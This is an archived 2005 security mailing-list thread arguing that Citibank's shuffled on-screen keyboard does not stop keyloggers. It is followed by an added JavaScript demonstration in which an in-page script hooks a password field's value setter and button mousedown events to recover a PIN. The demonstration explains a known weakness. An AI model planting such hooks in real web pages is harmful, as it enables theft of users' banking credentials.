WebApp Sec mailing list archives

RE: Citi-Bank Virtual Keyboard (is useless)


From: "Debasis Mohanty" <mail () hackingspirits com>
Date: Sun, 14 Aug 2005 22:53:02 +0530

Mike,

I wrote a virtual keyboard in C# for a security application and so far I
cannot find any key logger that can obtain the password. I am sure someone
could write one, but they HAVE to obtain the button value and not the form
field value to obtain the password, because of extra security features I
added; when the keyboard is used that password is protected.

lol !! Release the app to the internet, or if it is used widely (preferably
by any financial organisation), then I am sure that if it attracts the malicious
program writers it will hardly take a few minutes to write a KL. ;-)


- D 



-----Original Message-----
From: intel96 [mailto:intel96 () bellsouth net] 
Sent: Sunday, August 14, 2005 6:17 PM
To: mike () securityfocus com; webappsec () securityfocus com;
com () securityfocus com
Subject: Re: Citi-Bank Virtual Keyboard (is useless)

Mike,

I wrote a virtual keyboard in C# for a security application and so far I
cannot find any key logger that can obtain the password. I am sure someone
could write one, but they HAVE to obtain the button value and not the form
field value to obtain the password, because of extra security features I
added; when the keyboard is used that password is protected. Can you provide
me some examples of key loggers that can obtain the button that was pressed
(using the mousedown event) on a virtual keyboard and not what is sent to
the form field box?

Thanks,

Intel96

mike () securityfocus com wrote:

Virtual Keyboards (ala Citibank.co.in) are not very useful. They provide
absolutely no protection whatsoever against keyloggers.

I have been to the citibank.co.in site and it is clear that even though the
virtual keyboard is dynamic, it still places characters into a form field.
Keyloggers can easily read this and all other fields on the form as plain
text.

It is highly misleading to give the appearance of security because the
numbers are displayed in some pseudo-random fashion.

Someone posted here that it is unfair to criticize or discuss the security
aspects of the virtual keyboard because there were no other viable
alternatives. The exact quote was:

Quote:

"Seriously!! Have you understood the purpose of the original post?? Well,
saying virtual keyboards don't help much is like saying something as if some
other option will really make it hack proof. Can you suggest something
really hackproof?? ... Huh!!

/quote

The fact that virtual keyboards are marketed as security devices or
enhancements makes them fair game for discussion. An open consensus will
determine whether they are as secure as claimed by their well-intentioned
developers. Period.

There are many alternatives. Sharecube (self-plug) makes one as do many
other companies.

Mike Podanoffsky
mike at sharecube dot com
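The following is an added example illustrating the point made in this thread; it is not code from any of the posters, from Citibank or from Sharecube. It models, in plain JavaScript runnable under Node, a "dynamic" virtual keyboard that shuffles its key layout each session and writes the chosen digit into a form field, and then shows that code running in the same page (an injected script, a malicious browser extension, or in 2005 terms a BHO) recovers the password two independent ways: by hooking the field's `value` setter, as Mike describes, and by listening for the `mousedown` on the virtual buttons, as intel96 asks about. The `FakeInput` and `Emitter` classes are constructed stand-ins for the DOM input element and its event dispatch so the example runs offline; the PIN and the layout seed are made-up sample values. In a real browser the same setter hook is placed on `HTMLInputElement.prototype` instead of on one object.

```javascript
// Added example (not from the thread). Models a shuffled virtual keyboard
// and an in-page logger that captures what is typed two different ways.

// Constructed stand-in for an <input> element: a .value accessor on the prototype,
// which is also how the real HTMLInputElement exposes its value.
class FakeInput {
  constructor() { this._value = ""; }
  get value() { return this._value; }
  set value(v) { this._value = String(v); }
}

// Constructed stand-in for addEventListener/dispatchEvent.
class Emitter {
  constructor() { this.listeners = new Map(); }
  addEventListener(type, fn) {
    if (!this.listeners.has(type)) this.listeners.set(type, []);
    this.listeners.get(type).push(fn);
  }
  dispatchEvent(type, detail) {
    for (const fn of this.listeners.get(type) || []) fn(detail);
  }
}

// Deterministic Fisher-Yates shuffle (LCG-seeded) so the run is reproducible.
// A production keyboard would draw a fresh random layout per session; the
// attack below does not depend on how the layout is chosen.
function shuffledLayout(seed) {
  const keys = "0123456789".split("");
  let s = seed >>> 0;
  for (let i = keys.length - 1; i > 0; i--) {
    s = (Math.imul(s, 1103515245) + 12345) & 0x7fffffff;
    const j = s % (i + 1);
    [keys[i], keys[j]] = [keys[j], keys[i]];
  }
  return keys; // keys[position] is the digit painted on the button at that position
}

class VirtualKeyboard extends Emitter {
  constructor(input, seed) {
    super();
    this.input = input;
    this.layout = shuffledLayout(seed);
  }
  // The user presses the on-screen button at position `pos`: fire mousedown,
  // then append the button's label to the form field, as the Citibank-style
  // keyboard described in the thread does.
  click(pos) {
    const button = { position: pos, label: this.layout[pos] };
    this.dispatchEvent("mousedown", button);
    this.input.value = this.input.value + button.label;
  }
}

// Attacker-controlled code running in the same page. It never sees physical
// keystrokes, yet it recovers the PIN from both places the keyboard touches.
function installLogger(input, keyboard) {
  const captured = { viaField: "", viaButtons: "" };

  // 1. Form-field capture: shadow the prototype's value accessor on this
  //    object so every write passes through the logger before reaching the
  //    field. Physical key, paste or virtual keyboard makes no difference.
  const proto = Object.getPrototypeOf(input);
  const desc = Object.getOwnPropertyDescriptor(proto, "value");
  Object.defineProperty(input, "value", {
    get() { return desc.get.call(this); },
    set(v) { captured.viaField = String(v); desc.set.call(this, v); },
    configurable: true,
  });

  // 2. Button capture: the layout is shuffled, but the pressed button carries
  //    its own label, so the randomisation hides nothing from a listener.
  keyboard.addEventListener("mousedown", (btn) => { captured.viaButtons += btn.label; });

  return captured;
}

// Types a sample PIN through the virtual keyboard with the logger installed
// and returns what the field holds alongside what the logger captured.
function demo(pin = "4271", seed = 7) {
  const input = new FakeInput();
  const kb = new VirtualKeyboard(input, seed);
  const log = installLogger(input, kb);
  for (const digit of pin) {
    kb.click(kb.layout.indexOf(digit)); // press whichever button shows this digit
  }
  return { typed: input.value, viaField: log.viaField, viaButtons: log.viaButtons };
}

console.log(JSON.stringify(demo()));
```

Both captured strings equal the PIN regardless of the seed, which is the practical content of the thread: shuffling the on-screen layout defeats only a logger that records raw scan codes, not one that reads the field or the button events, and any code with script-level access to the page has both.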